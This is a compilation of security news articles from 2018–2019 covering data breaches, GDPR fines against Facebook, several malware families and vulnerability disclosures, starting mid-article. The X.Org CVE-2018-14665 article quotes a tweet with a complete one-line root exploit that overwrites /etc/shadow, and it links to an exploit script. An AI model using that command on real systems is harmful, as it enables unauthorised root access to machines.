He also said the company is investing in measures to beef up protection, including building a new tool to let users clear their browsing activity and deploying artificial intelligence to detect fake accounts and take down extremist content.

They both said they supported regulation, with Pichai noting Google recently proposed a legislative framework that would build on GDPR and extend many of its principles to users globally.

The International Conference of Data Protection and Privacy Commissioners, held in a different city every year, normally attracts little attention but its Brussels venue this year takes on symbolic meaning as EU officials ratchet up their tech regulation.

The 28-nation EU took on global leadership of the issue when it launched GDPR. The new rules require companies to justify the collection and use of personal data gleaned from phones, apps and visited websites. They must also give EU users the ability to access and delete data, and to object to data use.

GDPR also allows for big fines benchmarked to revenue, which for big tech companies could amount to billions of dollars.

In the first big test of the new rules, Ireland's data protection commission, which is a lead authority for Europe as many big tech firms are based in the country, is investigating Facebook's data breach, which let hackers access 3 million EU accounts.

Google, meanwhile, shut down its Plus social network this month after revealing it had a flaw that could have exposed personal information of up to half a million people.

SOC-as-a-Service Firm Arctic Wolf Networks Raises $45 Million
27.10.2019 securityweek

Arctic Wolf Networks, a Sunnyvale, Calif.-based company that offers outsourced security operations center (SOC) services, announced this week that it has raised $45 million in series C funding led by Future Fund. The company has raised a total of $91.2 million to-date.

The company offers a turnkey “SOC-as-a-Service” that includes what the company calls a “Concierge Security Engineer” (CSE) that serves as a single point of contact for a customer and an extension of a customer’s internal security team.

Founded in 2012, Arctic Wolf eliminates the need to build a SOC and also helps companies combat the cyber-security skills shortage. The company provides customers with 24×7 monitoring, tailored alerts, and incident investigation and response.

With no hardware or software purchase needed, Arctic Wolf’s end-to-end service installs in minutes to immediately provide threat detection.

The new funding round saw participation from Adams Street and Unusual Ventures, which joined existing investors, Lightspeed Venture Partners, Redpoint Ventures, Sonae Investment Management and Knollwood Investment Advisory LLC.

The company plans on using the new funding to accelerate growth and meet demand for its SOC-as-a-service offering.

The company more than doubled its workforce over the past year, and currenty employs 166 people across four North American offices.

“Our growing team of security engineers is redefining the economics of security to protect companies of all sizes. In addition to supporting continued company growth, the funding will accelerate expansion of our service offering, as we continue to scale and expand to meet our customers’ individualized needs,” Brian NeSmith, CEO and co-founder of Arctic Wolf, said.

British Airways: additional 185,000 passengers may have been affected
27.10.2019 securityaffairs

The data breach suffered by the British Airways airline is worse than initially thought, according to IAG firm that wons the airline further 185,000 customers may have had impacted in the incident.
The data breach suffered by the British Airways airline is worse than initially thought, according to IAG firm that owns the airline, further 185,000 customers may have had impacted in the incident.

An investigation conducted by researchers at RiskIQ revealed that the attack was carried out by a crime gang tracked as MageCart.

Hackers accessed personal and financial data of additional 77,000 payment card holders, including name, billing address, email address, card payment information.

Additional 108,000 customers’ personal details without card verification value have also been compromised.

“While we do not have conclusive evidence that the data was removed from British Airways’ systems, we are taking a prudent approach in notifying potentially affected customers, advising them to contact their bank or card provider as a precaution. Customers who are not contacted by British Airways by Friday 26 October at 1700 GMT do not need to take any action.” reads the statement published by British Airways.

“In addition, from the investigation we know that fewer of the customers we originally announced were impacted. Of the 380,000 payment card details announced, 244,000 were affected. Crucially, we have had no verified cases of fraud.”

IAG confirmed that the company has been “working continuously with specialist cyber forensic investigators and the National Crime Agency to investigate fully the data theft.”

The spokesperson for British Airways said that the company has contacted all affected customers via email before 5 pm on Friday, and plans to compensate affected customers.

At the time of writing, British Airways declared there had been no verified cases of fraud since it disclosed the security breach.

CVE-2018-14665 privilege escalation flaw affects popular Linux distros
27.10.2019 securityaffairs

Security researcher discovered a highly critical vulnerability (CVE-2018-14665) in X.Org Server package that affects major Linux distributions.
The Indian security researcher Narendra Shinde has discovered a highly critical vulnerability (CVE-2018-14665) in X.Org Server package that affects major Linux distributions, including OpenBSD, Debian, Ubuntu, CentOS, Red Hat, and Fedora.

Xorg X project provides an open source implementation of the X Window System (aka X11, or simply X, that is a windowing system for bitmap displays. It provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard.

Shinde discovered that Xorg X server doesn’t correctly handle and validate arguments for at least the following two command-line parameters:

-modulepath: to set a directory path to search for Xorg server modules,
-logfile: to set a new log file for the Xorg server, instead of using the default log located at /var/log/Xorg.n.log on most platforms.
According to Narendra Shinde a low-privileged user could exploit it to execute malicious code and overwrite any file on the system

“X.org X Server application is vulnerable to privilege escalation issue. X.org X Server application allows lower privileged user to create or overwrite file anywhere on system , including files owned by privileged users (ex. /etc/shadow).” reads the advisory published by the expert.

“The attacker needs to have active console session to exploit this issue.”

The flaw was introduced in X.Org server 1.19.0 package more than two years ago.

Xorg published a security advisory on the CVE-2018-14665 flaw.

“When the X server is running with elevated privileges (i.e., when Xorg is installed with the setuid bit set and started by a non-root user).” reads the Xorg advisory.

“The -modulepath argument can be used to specify an insecure path to modules that are going to be loaded in the X server, allowing to execute unprivileged code in the privileged process.

The -logfile argument can be used to overwrite arbitrary files in the file system, due to incorrect checks in the parsing of the option.”

The security expert Matthew Hickey also published a proof-of-concept exploit code that could allow an attacker to take over vulnerable systems with 3 commands or less.

Hacker Fantastic
OpenBSD #0day Xorg LPE via CVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with 3 commands or less. exploit https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh … 🙄

11:14 PM - Oct 25, 2018
433 people are talking about this
Twitter Ads info and privacy

Hacker Fantastic
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.

7:53 PM - Oct 25, 2018
915 people are talking about this
Twitter Ads info and privacy
The X.Org foundation addressed the vulnerability with the release of the X.Org Server version 1.20.3.

Major distros, including OpenBSD, Debian, Ubuntu, CentOS, Red Hat, and Fedora have published security advisories for the CVE-2018-14665 flaw.

Multiple Vulnerabilities Patched in ASRock Drivers

27.10.2019 securityweek Vulnerebility

SecureAuth Labs security researchers have discovered multiple vulnerabilities in low-level drivers installed by ASRock utilities.

Established in 2002, ASRock is the third largest motherboard brand globally. Headquartered in Taipei, Taiwan, the company has branches in Europe and the United States. The maker offers a series of utilities that provide users control over certain settings and functions.

SecureAuth discovered a series of security flaws in AsrDrv101.sys and AsrDrv102.sys low-level drivers that the ASRock RGBLED and other ASRock branded utilities install. By exploiting these vulnerabilities, a local attacker can elevate privileges on the system.

The vulnerabilities were found in ASRock RGBLED, A-Tuning, F-Stream, and RestartToUEFI. The vendor has already released patched versions of each application: ASRock RGBLED v1.0.36, A-Tuning v3.0.216, F-Stream v3.0.216, and RestartToUEFI v1.0.7.

The low-level drivers are used to program and query the status on embedded integrated circuits. Thus, the applications can access fan performance curves, clock frequencies, LED colors, thermal performance, and other user-customizable properties and monitoring functionality.

One of the main issues discovered by the researchers was that these drivers would expose functionality to read and write control register (CR) values. The flaw, tracked as CVE-2018-10709, could be abused to run code with elevated privileges.

Another issue the researchers discovered was related to input/output control code in the driver, which exposed functionality to read and write arbitrary physical memory, also leading to privilege escalation (CVE-2018-10710).

The driver also exposes functionality to read and write Machine Specific Registers (MSRs), which an attacker could leverage to execute arbitrary ring-0 code (CVE-2018-10711), SecureAuth reveals.

Functionality to read/write data from/to IO ports was also exposed, allowing an attacker to run code with elevated privileges (CVE-2018-10712).

The security researchers reported the findings to ASRock in March, and the company was able to resolve the issues within a month. According to SecureAuth, the new driver architecture was rolled out to ASRock utilities only in August.

'TimpDoor' Malware Turns Android Devices into Proxies

27.10.2019 securityweek Android

A newly discovered piece of Android malware creates a Socks proxy on infected devices, potentially allowing access to internal networks, McAfee reports.

Dubbed TimpDoor, the threat is distributed through phishing text messages that attempt to trick users into installing a fake voice message app. As soon as the app is installed, however, a background service starts a Socks proxy to “redirect all network traffic from a third-party server via an encrypted connection through a secure shell tunnel.”

Not only do infected devices serve as backdoors, but the attackers could also abuse a network of compromised devices to send spam and phishing emails, perform ad click fraud, or launch distributed denial-of-service (DDoS) attacks, McAfee’s security researchers say.

The earliest malware variant was available in March, while the latest at the end of August, the researchers believe. The malware apparently infected at least 5,000 devices in a campaign targeting users in the United States since at least the end of March.

The phishing SMS messages inform the user they have two voice messages they need to review and also present them with a URL to follow. If the user clicks on the link, a fake web page is displayed, asking them to install an application to listen to the voice messages.

After installation, the fake app offers to render the voice messages, but hides its icon from the home screen as soon as the user completes this operation. In the background, however, a service is started without the user’s knowledge.

Next, the malware gathers a broad range of information, such as device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. Afterwards, it starts a secure shell (SSH) connection to the control server and sends the device ID to receive an assigned remote port it would later use for remote port forwarding, and also ensures that the SSH connection is kept alive.

At the same IP address that hosted the fake voice application, the researchers found more APK files, which revealed that earlier versions of the malware used an HTTP proxy (LittleProxy), while newer ones switched to a Socks proxy (MicroSocks). The package name and control server URLs also changed.

TimpDoor, however, is not the first Android malware to turn devices into mobile proxies. MilkyDoor, an apparent successor of DressCode, was discovered last year with similar capabilities. While DressCode only installs a Socks proxy on the infected device, MilkyDoor also uses port forwarding via SSH, the same as TimpDoor.

However, there are numerous differences between TimpDoor and MilkyDoor, ranging from distribution (SMS phishing versus Google Play), to the SSH connection and proxy functionality. The older threat appears to be a more complete SDK, while the newer malware only has basic proxy functionality.

“TimpDoor is the latest example of Android malware that turns devices into mobile backdoors—potentially allowing cybercriminals encrypted access to internal networks, which represents a great risk to companies and their systems. The versions found on the distribution server and the simple proxy functionality implemented in them shows that this threat is probably still under development,” McAfee concludes.

Researchers Find Command Injection Flaw in Cisco WebEx
27.10.2019 securityweek

Cisco’s WebEx software is affected by a serious vulnerability that can be exploited to execute arbitrary commands with elevated privileges.

The security hole was discovered by Ron Bowes and Jeff McJunkin of Counter Hack. The researchers dubbed the flaw WebExec and even set up a dedicated website for it at webexec.org.

The vulnerability, tracked as CVE-2018-15442, was reported to Cisco in early August and patches were released within two months. Cisco coordinated the disclosure of the flaw with the researchers and there is no evidence that it has been exploited for malicious purposes.

According to Cisco, the WebExec vulnerability affects Webex Meetings Desktop App prior to 33.6.0, and Webex Productivity Tools releases 32.6.0 and later, prior to 33.0.5.

Cisco says the flaw can be exploited by an authenticated, local attacker to execute arbitrary commands with SYSTEM privileges. However, the networking giant noted that remote exploitation may also be possible in Active Directory deployments through the operating system’s remote management tools.

“This is a pretty unique vulnerability, because it's a remote vulnerability in a client application that doesn't even listen on a port,” Bowes and McJunkin wrote. “The summary is: when the WebEx client is installed, it also installs a Windows service called WebExService that can execute arbitrary commands at SYSTEM-level privilege. Due to poor ACLs, any local or domain user can start the process over Window's remote service interface (except on Windows 10, which requires an administrator login).”

The researchers have made available proof-of-concept (PoC) code for both Nmap and Metasploit, along with a tool that allows users to check if their systems are vulnerable. Technical details on the vulnerability have also been released.

Questions Mount Over Delay After Cathay Pacific Admits Huge Data Leak
27.10.2019 securityweek

Hong Kong carrier Cathay Pacific came under pressure Thursday to explain why it had taken five months to admit it had been hacked and compromised the data of 9.4 million customers, including passport numbers and credit card details.

The airline said Wednesday it had discovered suspicious activity on its network in March and confirmed unauthorised access to certain personal data in early May.

However, chief customer and commercial officer Paul Loo said officials wanted to have an accurate grasp on the situation before making an announcement and did not wish to "create unnecessary panic".

News of the leak sent shares in Cathay, which was already under pressure as it struggles for customers, plunging more than six percent to a nine-year low in Hong Kong trading.

Local politicians slammed the carrier, saying its response had only fuelled worries.

"Whether the panic is necessary or not is not for them to decide, it is for the victim to decide. This is not a good explanation at all to justify the delay," said IT sector lawmaker Charles Mok.

And legislator Elizabeth Quat said the delay was "unacceptable" as it meant customers missed five months of opportunities to take steps to safeguard their personal data.

The airline admitted about 860,000 passport numbers, 245,000 Hong Kong identity card numbers, 403 expired credit card numbers and 27 credit card numbers with no card verification value (CVV) were accessed.

Other compromised passenger data included nationalities, dates of births, phone numbers, emails, and physical addresses.

- Probe launched -

"We have no evidence that any personal data has been misused. No-one's travel or loyalty profile was accessed in full, and no passwords were compromised," chief executive Rupert Hogg said in a statement Wednesday.

But Mok said the public needs to know how the company can prove that was the case.

"Such a statement doesn't give people absolute confidence that we are completely safe, and it doesn't mean that some of this data would not be misused later," Mok told AFP.

He also pointed out that the the European Union’s new General Data Protection Regulation says any such breach should be reported within 72 hours.

Hong Kong's privacy commissioner Stephen Wong expressed "serious concern" over the breach in a statement Thursday and said the office would initiate a compliance check with the airline.

"Organisations in general that amass and derive benefits from personal data should ditch the mindset of conducting their operations to meet the minimum regulatory requirements only," Wong said.

"They should instead be held to a higher ethical standard that meets the stakeholders' expectations alongside the requirements of laws and regulations," he added.

Cathay said it had launched an investigation and alerted the police after an ongoing IT operation revealed unauthorised access of systems containing the passenger data.

The company is in the process of contacting affected passengers and providing them with solutions to protect themselves.

- Struggling business -

Cathay Pacific is already battling to stem major losses as it comes under pressure from lower-cost Chinese carriers and Middle East rivals.

It booked its first back-to-back annual loss in its seven-decade history in March, and has previously pledged to cut 600 staff including a quarter of its management as part of its biggest overhaul in years.

Shares of the carrier plunged 3.77 percent on Thursday.

The troubled airline did not mention financial compensation for passengers affected by the data leak, but British Airways pledged to compensate customers when the UK flag carrier suffered a data hack last month.

BA revealed in September that personal and financial details of about 380,000 customers who booked flights on the group's website and mobile phone app over several weeks had been stolen.

The leak is the latest to hit global companies in recent years.

Facebook revealed last month that up to 50 million accounts were breached by hackers, while ride-sharing giant Uber was vilified after a breach in 2016 of data on 57 million of its riders and drivers was revealed only in November 2017.

In April, the holding company of Yahoo was fined $35 million by US regulators because it had not informed them until this year that hackers had stolen "crown jewel" data including email addresses and passwords.

And in US credit bureau Equifax identified almost 150 million American consumers' personal details had been exposed by a massive data breach that sparked a public outcry and a congressional probe.

In 2011 Sony suffered a massive breach that compromised more than 100 million accounts and forced it to temporarily halt its PlayStation Network and Qriocity services.

UK Regulator Hits Facebook With Maximum Fine
27.10.2019 securityweek

ICO Fines Facebook Maximum £500,000 Over its Role in the Cambridge Analytica Scandal

Back in April, SecurityWeek asked the question, 'would Facebook be in breach of GDPR over the Cambridge Analytica scandal?' The question has been answered unequivocally: Yes.

This confirms the advice we were given at the time. "From Facebook's perspective," MacRoberts LLP senior partner David Flint said, "the only good point is that the maximum fine under the [current UK] Data Protection Act is £500,000; after 25 May 2018 it would be 4% of Facebook worldwide turnover ($40bn in 2017) -- a potential $1.6bn fine! That's before damages claims."

Today the UK's data protection regulator, Information Commissioner Elizabeth Denham, announced that Facebook (defined as Facebook Ireland Ltd, and Facebook Inc -- the Facebook Companies) has indeed been fined £500,000. "The ICO's investigation," explains the regulator, "found that between 2007 and 2014, Facebook processed the personal information of users unfairly by allowing application developers access to their information without sufficiently clear and informed consent, and allowing access even if users had not downloaded the app, but were simply ‘friends' with people who had."

The specific app in question was developed by Dr Aleksandr Kogan and his company GSR. It harvested data of up to 87 million people worldwide. A large portion of this data was shared with the SCL group -- the parent company of political campaign organization Cambridge Analytica. The ICO's investigation found that "the personal information of at least one million UK users was among the harvested data and consequently put at risk of further misuse."

During the process of the investigation, Facebook argued that the ICO had no jurisdiction in the matter -- although it did cooperate with the ICO. The ICO's Decision Notice (PDF) explains its position:

"UK Users would include (but would not be confined to) UK residents who made use of the Facebook site during the material time. UK Users would also include persons visiting the UK who made use of the Facebook site during the material time while visiting the UK. Because the processing by the Facebook Companies of personal data about the UK Users took place in the context of a UK establishment: (i) such processing fell within the scope of the DPA ; and (ii) the Commissioner has jurisdiction over the Facebook Companies in respect of such processing."

While Facebook has asserted that only personal data from U.S. citizens was used (misused under European principles) for Cambridge Analytica's political campaigning, the ICO comments, "Some US residents would also, from time to time, have been UK users (as defined above): e.g. if they used the Facebook site while visiting the UK."

The same principle of 'user' rather than citizen applies to GDPR. It reinforces a key point often missed by U.S. organizations: GDPR is not merely about protecting the PII of EU citizens, it applies to any person of any nationality who is within the geographical boundaries of the EU at the time.

Part of the reason for the ICO to apply the maximum fine possible under the legislation applicable at the time (the UK's Data Protection Act 1998, now superseded by the Data Protection Act 2018, being the UK's implementation of GDPR) was the persistence of Facebook's failing.

"Even after the misuse of the data was discovered in December 2015," says the ICO, "Facebook did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. In the case of SCL Group, Facebook did not suspend the company from its platform until 2018."

This is another key aspect of GDPR -- regulators will take into consideration efforts made to protect personal data. While rapid remedial action is unlikely to reduce any applicable fine, failure to act promptly and effectively will almost certainly increase it.

"Facebook failed to sufficiently protect the privacy of its users before, during and after the unlawful processing of this data. A company of its size and expertise should have known better and it should have done better," said Elizabeth Denham.

It is, however, her next comment that should sound a warning to all companies of any size that process -- and allow the unlawful processing -- of EU users' data: "We considered these contraventions to be so serious we imposed the maximum penalty under the previous legislation. The fine would inevitably have been significantly higher under the GDPR. One of our main motivations for taking enforcement action is to drive meaningful change in how organizations handle people's personal data. Our work is continuing."

GDPR isn't merely designed to punish transgressors; it is designed to punish them so severely that they will actually change their business practices. Much larger fines under GDPR are inevitable.

BA Says 185,000 More Customers Affected in Cyber Attack
27.10.2019 securityweek
Attack  Incindent

British Airways owner IAG on Thursday said that a further 185,000 customers may have had their personal details stolen in a cyber attack earlier this year.

This includes the holders of 77,000 payment cards whose name, billing address, email address, card payment information have potentially been compromised.

A further 108,000 people's personal details without card verification value have also been compromised, the airline said in a statement.

"While British Airways does not have conclusive evidence that the data was removed from its systems, it is taking a prudent approach in notifying potentially affected customers, advising them to contact their bank or card provider as a precaution," it said.

The company, which has promised to compensate any affected customers, said there had been no verified cases of fraud since its first announcement about the cyber attack in September.

BA at the time took out full-page adverts in the UK newspapers to apologise to customers and called the theft "a very sophisticated, malicious, criminal attack on our website".

The company could be expected to comment further on the attack when IAG publishes its third quarter results on Friday.

The attack came after previous IT woes, including a worldwide system outage last year that affected thousands of customers.

Experts presented BOTCHAIN, the first fully functional Botnet built upon the Bitcoin Protocol
26.10.2019 securityaffairs

Security experts Antonio Pirozzi and Pierluigi Paganini presented BOTCHAIN, the first fully functional Botnet built upon the Bitcoin Protocol.
Security expert Antonio Pirozzi, director at ZLab malware lab at Cybaze firm, presented at the EU Cyber Threat Conference in Dublin conducted a research along with Pierluigi Paganini (aka @securityaffairs), about how crooks could abuse blockchain for malicious purposes.

The presentation titled “BOTCHAIN aka The Dark side of Blockchain” includes details about the first fully functional Botnet built upon the Bitcoin Protocol named “BOTCHAIN”.

The blockchain is a system “read-only” by design, it is resilient to data modification and provides the recording of transactions between two parties in a verifiable and reliable way without the need of a third-party. These properties make blockchain a privileged technology for different applications (i.e. healthcare applications, supply chain tracking, smart contracts, identity management) but it could also be abused by cybercriminals to carry out malicious activities.

Pirozzi explains that cybercriminals already have exploited blockchain in attacks in the wild, for example in the case of the popular carding store Joker’s Stash when they have adopted a peer-to-peer DNS system based on blockchain.

The Automated Vending Cart (AVC) website was launched in 2017 using blockchain DNS alongside its Tor (.onion) domain to hide malicious activities and set up a bulletproof their platform. Blockchain-based TLDs like .bit .bazar and .coin provides cybercriminal with a new level of covertness for their online marketplace.

Pirozzi has cited a recent study conducted by researchers from the RWTH Aachen University (Germany) that demonstrates how blockchain could be used as a permanent storage for any kind of data, even illegal stuff such as child pornography content and terrorist propaganda. The experts analyzed Bitcoin transactions and found at least 274 links to child abuse content or links to dark web services.

Pirozzi and Paganini have practically demonstrated how cybercriminal could abuse blockchain for their malicious purpose.

“Cybercriminal could abuse the “OP_RETURN” field of a Bitcoin Transaction to deliver malware control mechanism, botnet commands, or malware distribution mechanism as also presented during the Black Hat ASIA 2016 conference by INTERPOL ‘s Christian Karam and KASPERSKY’s VITALY Kamluk” said Pirozzi.

“Our research demonstrates that it is possible to abuse blockchain technology to set up a command and control mechanism for a malware that leverage blockchain. BOTCHAIN it the first fully functional Botnet built upon the Bitcoin protocol.” Added Paganini. ”many threat actors, including APT groups, already have technical capabilities to develop such kind of botnet, for this reason, it is crucial to explore how attackers can abuse blockchain”

Pirozzi explained that in the past, other researchers teams also investigated the possibilities to use blockchain technology as an infrastructure for BOTNET, most important researches are ZombieCoin, Botract, and UnblockableChains, the former two are based on Ethereum.

“BOTCHAIN is the first fully functional BOTNET built upon the Bitcoin protocol, unlike other similar botnets, BOTCHAIN, has as High availability characteristics because zombies does not have any hardcoded C2 address, attackers could use any wallet as C2, unlike Zombiecoin it uses a hidden service for the C2 dynamic discovery like the SKYNET BOTNET of 2012”. Explained Pirozzi.

“Over the year crooks have adopted different techniques to build more resilient and covert topologies for their botnet, from simple IRC or HTTP to UDP over TCP or P2P Network or DGA or abusing cloud services. All these techniques are vulnerable to takedown made by law enforcement and security firms once the network topology has been discovered. In this PoC, the discovery and analysis of one single BOT won’t expose the entire botnet or portion of it.”

“Of course, there is an economic aspect to consider when dealing with botnet using Bitcoin blockchain-based botnet. We have analyzed it in our research and I can tell you that it is not a problem for persistent actors that want to use it in targeted attacks.” Paganini said.

Gavin Andreson, chief scientist at the Bitcoin Foundation, declared that “using C&C on the blockchain would be “very expensive” due to the transaction fees hackers would have to pay. He also noted that botnet operators don’t want there to be any permanent record of their crimes.”

Pirozzi also said:

“If you pay too low transaction fees, your transaction might never be confirmed and will become stuck, this is a limit for botnet operators but there are specific moments in the Bitcoin market that are more convenient to make a transaction because transaction fees per byte become low. Crooks could exploit these specific moments to conduct a malicious massive campaign”.

It is a common opinion for some security experts and law enforcement agencies that cybercriminals could start abusing Blockchain for malicious purposes.

The research includes some suggestions and open points to mitigate this kind of threats. Security experts explained that one possible solution is to use blacklist for miners in order to avoid the validations of blocks in which resides malicious contents, but the open issue remains the identifications of that specific blocks that could be very hard due to the introduction of obfuscation mechanisms.

Many experts believe that quantum computers will allow modifying the data inside each transaction, but this not possible now and probably the introduction of quantum cryptography will prevent it.

At the time it is impossible to take down the communication between bot and C2 also if we are able to identify the transactions involved, this aspect must be carefully analyzed.

UK ICO fines Facebook with maximum for Cambridge Analytica scandal
26.10.2019 securityaffairs

Facebook has been fined £500,000 by the UK’s Information Commissioner’s Office (ICO) for the Cambridge Analytica privacy scandal that exposed data of 87 million users.
The announcement was made by the UK’s data protection regulator, Information Commissioner Elizabeth Denham.

“The ICO’s investigation found that between 2007 and 2014, Facebook processed the personal information of users unfairly by allowing application developers access to their information without sufficiently clear and informed consent, and allowing access even if users had not downloaded the app, but were simply ‘friends’ with people who had.” she said.

This is the first possible financial punishment that Facebook was facing for the Cambridge Analytica scandal.

According to the ICO data from at least 1 million British citizens was “unfairly processed,” the organization blames Facebook because it has “failed to take appropriate technical and organisational measures” to prevent the abuse of users’ data.

The ICO also accused Facebook to have “failed to make suitable checks on apps and developers using its platform.”

“The ICO’s investigation found that between 2007 and 2014, Facebook processed the personal information of users unfairly by allowing application developers access to their information without sufficiently clear and informed consent, and allowing access even if users had not downloaded the app, but were simply ‘friends’ with people who had,” states the ICO.

“Even after the misuse of the data was discovered in December 2015,” continues the ICO, “Facebook did not do enough to ensure those who continued to hold it had taken adequate and timely remedial action, including deletion. In the case of SCL Group, Facebook did not suspend the company from its platform until 2018.”

Facebook Data Breach

Social network giant announced it is reviewing the ICO’s penalty and is asking to access Cambridge Analytica servers to analyze data they collected.

“We are grateful that the ICO has acknowledged our full co-operation throughout their investigation and have also confirmed they have found no evidence to suggest UK Facebook users’ data was in fact shared with Cambridge Analytica,” a Facebook spokesperson said.

“Now that their investigation is complete, we are hopeful that the ICO will now let us have access to CA servers so that we are able to audit the data they received.”

I personally believe that this fine is just symbolic if we compare it with potential penalties faced by the social network giant under EU’s General Data Protection Regulation (GDPR). GDPR establishes a maximum fine of 20 million euros or 4% of company annual global revenue (roughly£1.26 billion).

Experts released a free Decryption Tool for GandCrab ransomware
26.10.2019 securityaffairs

Good news for the victims of the infamous GandCrab ransomware, security experts have created a decryption tool that allows them to decrypts files without paying the ransom.
Bitdefender security firm along with Europol, the FBI, Romanian Police, and other law enforcement agencies has developed a free ransomware decryption tool.

“The good news is that now you can have your data back without paying a cent to the cyber-criminals, as Bitdefender has released a free utility that automates the data decryption process.” reads the blog post published by Bitdefender.

“This tool recovers files encrypted by GandCrab ransomware versions 1, 4 and 5.”

Victims can determine this ransomware version by analyzing the extension appended to the encrypted files and/or ransom-note. In the following table are reported the information for the various versions of the popular ransomware.

Version 1: file extension is .GDCB. The ransom note starts with —= GANDCRAB =—, ……………. the extension: .GDCB
Version 2: file extension is .GDCB. The ransom note starts with —= GANDCRAB =—, ……………. the extension: .GDCB
Version 3: file extension is .CRAB. The ransom note starts with —= GANDCRAB V3 =— ……….. the extension: .CRAB
Version 4: file extension is .KRAB. The ransom note starts with —= GANDCRAB V4 =— ……….. the extension: .KRAB
Version 5: file extension is .([A-Z]+). The ransom note starts with —= GANDCRAB V5.0 =— ………. the extension: .UKCZA
Version 5.0.1: file extension is .([A-Z]+). The ransom note starts with —= GANDCRAB V5.0.2 =— …. the extension: .YIAQDG
Version 5.0.2: file extension is .([A-Z]+). The ransom note starts with—= GANDCRAB V5.0.2 =— …. the extension: .CQXGPMKNR
Version 5.0.3: file extension is .([A-Z]+). The ransom note starts with—= GANDCRAB V5.0.2 =— …. the extension: .HHFEHIOL
“Developed in close partnership with Europol and the Romanian Police, and with support from the FBI and other law enforcement agencies, the tool lets victims around the world retrieve their encrypted information without paying tens of millions of dollars in ransom to hackers.” reads the statement published by the Bitdefender.

“The new tool can now decrypt data ransomed by versions 1, 4 and 5 of the GandCrab malware, as well as all versions of the ransomware for a limited set of victims in Syria.”

GandCrab was first spotted earlier this year by cyber security firm LMNTRIX that discovered an advertisement in Russian hacking community on the dark web.

Anti-Ransom Remote Tool GandCrabDecryptor.

GandCrab is offered as a ransomware-as-a-service, where crooks offer the malware to criminals for a share of the ultimate profits.

This ransomware spreads via multiple attack vectors, including spam email, exploit kits and malware campaigns.

Phishing for knowledge
26.10.2019 Kaspersky

When we talk about phishing, top of mind are fake banking sites, payment systems, as well as mail and other globally popular services. However, cybercriminals have their fingers in far more pies than that. Unobviously, perhaps, students and university faculties are also in the line of fire. The reason is the research they carry out and the potentially valuable results.

Examples of phishing pages mimicking the login pages of the University of Washington, Harvard Business School, and Stanford University websites

Over the past year, we’ve registered phishing attacks against 131 universities in 16 countries. More than half (83 universities) are located in the US, followed by Britain (21), and Australia and Canada (7 each). Several well-known universities in Finland, Colombia, Hong Kong, India, Israel, the Netherlands, New Zealand, Poland, South Africa, Sweden, Switzerland, and the UAE have also experienced at least one phishing attack in the past year. The most popular universities for fraudsters so far this year are: University of Washington (11.6% of attacks), Cornell University (6.8%), University of Iowa (5.1%).

Although universities are aware of the need to protect their resources, fraudsters exploit the traditional weakest link: user inattentiveness. Depending on the level of access (lecturer, student, research associate), personal accounts on the university site can provide access to both general information as well as paid services and research results. Moreover, a lecturer’s account, for example, can provide attackers with information about salary, schedule, etc. All this can be used for identity theft or a targeted attack.

Cornell NetID is a unique electronic identifier used in combination with a password to provide access to non-public resources and university information

Phishing pages typically differ from the original only by the web address. However, despite the browser warning and, as in the case of the Cornell University fake page, the prompt to check the address bar (copied by the attackers from the original site), users often fail to spot the difference.

Besides login credentials, phishing pages can collect other information for bypassing anti-fraud systems

While analyzing the scripts of one of the phishing pages, we noticed that alongside user names and passwords, fraudsters collect information about IP addresses and the victim’s location. Cybercriminals can use this data to circumvent anti-fraud systems by masquerading as account holders.

How to stay protected
An old, but still important tip is to check the address bar of the site on which confidential data is about to be entered. But since this method relies solely on the human factor, the main recommendation for educational institutions is to use two-factor authentication, and for users — a software solution with anti-phishing capability.

Banking Trojans in Google Play Pose as Utility Apps
26.10.2018 securityweek
Android  Virus

Google recently removed 29 applications from Google Play after learning that they were actually containing code to steal users’ banking information.

The applications, found in the official app store from August until early October 2018, were masquerading as utility programs, including device boosters, cleaners and battery managers, as well as horoscope-themed apps.

These programs, ESET security researchers reveal, were sophisticated mobile banking Trojans packing complex functionality and highly focused on staying hidden. This sets them apart from the malicious apps that impersonate legitimate financial institutions and display bogus login screens.

The Trojans could dynamically target any app on the victim’s device, courtesy of tailored phishing forms. The malware operators could control them remotely to intercept and redirect text messages to bypass SMS-based two-factor authentication, intercept call logs, and download and install other apps.

Although uploaded to Google Play under different developer names, these apps presented code similarities and shared the command and control (C&C) server, which led the researchers to the conclusion they were the work of a single attacker or group.

Once installed and launched, the apps would usually display an error message, claiming incompatibility with the victim’s device and informing the user they were removed. Instead, they would only hide from the user and covertly engage in nefarious operations. Some of the apps, however, did offer the promised functionality — such as displaying horoscopes.

The malicious payload carried by the programs was encrypted and hidden in each app’s assets. When executed, the payload launches a dropper that checks for the presence of an emulator or a sandbox and only then proceeds to decrypting and dropping a loader and the actual banking malware.

The final payload was designed to impersonate banking apps installed on the victim’s device, intercept and send SMS messages, and download and install additional applications, based on the operator’s instructions.

The threat can “dynamically impersonate any app installed on a compromised device,” ESET reveals. For that, the malware obtains the HTML code of the installed apps and leverages that code to overlay bogus forms when legitimate apps are launched.

ESET says they discovered 29 such malicious apps, all of which have been removed from the official Android store. However, these programs did gather around 30,000 downloads before being removed.

“Fortunately, these particular banking Trojans do not employ advanced tricks to ensure their persistence on affected devices. Therefore, if you suspect you have installed any of these apps, you can simply uninstall them under Settings > (General) > Application manager/Apps,” ESET says.

Mac Malware Injects Ads Into Encrypted Traffic
26.10.2018 securityweek

A newly discovered piece of malware targeting macOS devices is capable of injecting ads into encrypted web traffic, Malwarebytes security researchers warn.

Detected as OSX.SearchAwesome, the malware is delivered through a malicious installer that arrives as a cracked app downloaded via a torrent file. The threat’s installer is a disk image file that lacks the usual decorations used to make it look legitimate.

When launched, the image file installs the components invisibly and then requests the user to authorize changes to Certificate Trust Settings and to allow a component called spi to modify the network configuration.

Similar to other adware programs out there, the spinstall app installs an application and launch agents, one of which is designed to execute the spi application. However, it doesn’t keep the app running constantly, meaning that the user can force it to quit, although the app opens again on the next login.

Another agent is designed to monitor spi.app for removal, and also to remove the other component of the malware if that happens.

